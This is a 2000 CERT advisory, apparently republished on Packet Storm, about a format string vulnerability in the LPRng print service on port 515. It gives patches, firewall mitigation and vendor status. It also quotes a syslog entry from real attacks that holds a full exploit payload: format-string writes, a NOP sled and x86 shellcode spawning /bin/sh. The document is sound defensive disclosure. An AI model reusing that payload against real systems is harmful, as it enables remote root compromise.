CERT Advisory CA-2000-22 - Input Validation Problems in LPRng. A popular replacement software package to the BSD lpd printing service called LPRng contains at least one format string vulnerability in the syslog() function, which allows remote users with access to TCP port 515 to execute arbitrary code on vulnerable systems as root. Fix available here.
7fc230b21bc7c073377322bd6f4f933c974648e8cc9f128acc8e460b7085da36
-----BEGIN PGP SIGNED MESSAGE-----
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format
string vulnerability,"[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an investigation and determined that Mac OS X
Public Beta and Mac OS X Server do not use LPRng and are therefore not
vulnerable to this exploitation.
Caldera OpenLinux
See CSSA-2000-033.0 "format bug in LPRng" at:
http://www.calderasystems.com/support/security/advisories/CSSA-
2000-033.0.txt
Compaq Computer Corporation
Compaq Tru64 UNIX S/W is not vulnerable.
FreeBSD
FreeBSD does not include LPRng in the base system. Older versions of
FreeBSD included a vulnerable version of LPRng in the Ports Collection
but this was corrected almost 2 months ago, prior to the release of
FreeBSD 4.2. See FreeBSD Security Advisory 00:56
(ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lp
rng.asc) for more information.
Hewlett-Packard Company
This does not apply to HP; HP does not ship LPRng on HP-UX.
IBM
IBM's AIX operating system is not vulnerable to this security exploit.
Microsoft Corporation
Microsoft doesn't use LPRng in any of its products, so no Microsoft
products are affected by the vulnerability.
NetBSD
NetBSD does not include LPRng in the base system; however we do have a
third-party package of LPRng-3.6.8 which is vulnerable. There's work
underway to upgrade it to a non-vulnerable version.
OpenBSD
OpenBSD does not ship lprng.
RedHat
LPRng Version 3.6.24 and earlier is vulnerable.
See RHSA-2000:065-04 at:
http://www.redhat.com/support/errata/RHSA-2000-065-06.html
SGI
IRIX does not contain LPRng support.
SuSE
SuSE is not vulnerable. Please see additional comments at:
http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
References
1. VU#382365: LPRng can pass user-supplied input as a format string
parameter to syslog() calls, CERT/CC, 10/06/2000,
https://www.kb.cert.org/vuls/id/382365
_________________________________________________________________
The CERT Coordination Center thanks Chris Evans for his initial report
on the vulnerability described in this advisory.
_________________________________________________________________
Author: This document was written by Jeffrey S Havrilla. Feedback on
this advisory is appreciated.
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2000-22.html
______________________________________________________________________
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more
information.
Getting security information
CERT publications and other security information are available from
our web site
http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins,
send email to majordomo@cert.org. Please include in the body of your
message
subscribe cert-advisory
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information
Copyright 2000 Carnegie Mellon University.
Revision History
Dec 12, 2000: Initial Release
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQCVAwUBOjYxtAYcfu8gsZJZAQEp/wP/Zo5uIe1y9vbTEmQz6CtlkLaejrEzzRua
eBakIkIz5CzLKL3+zMFsmTaC306fgFnOcV3lz9NmAzNLg8mqFZYruaTTVuTeY0Yg
+QTWG6DngiqH8ttKV91MjPGZZFpUWahVvVk+xUU/fLCMoc9FAUAenYoOfuduD9nO
w8+1WAtQPUs=
=bNBX
-----END PGP SIGNATURE-----
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed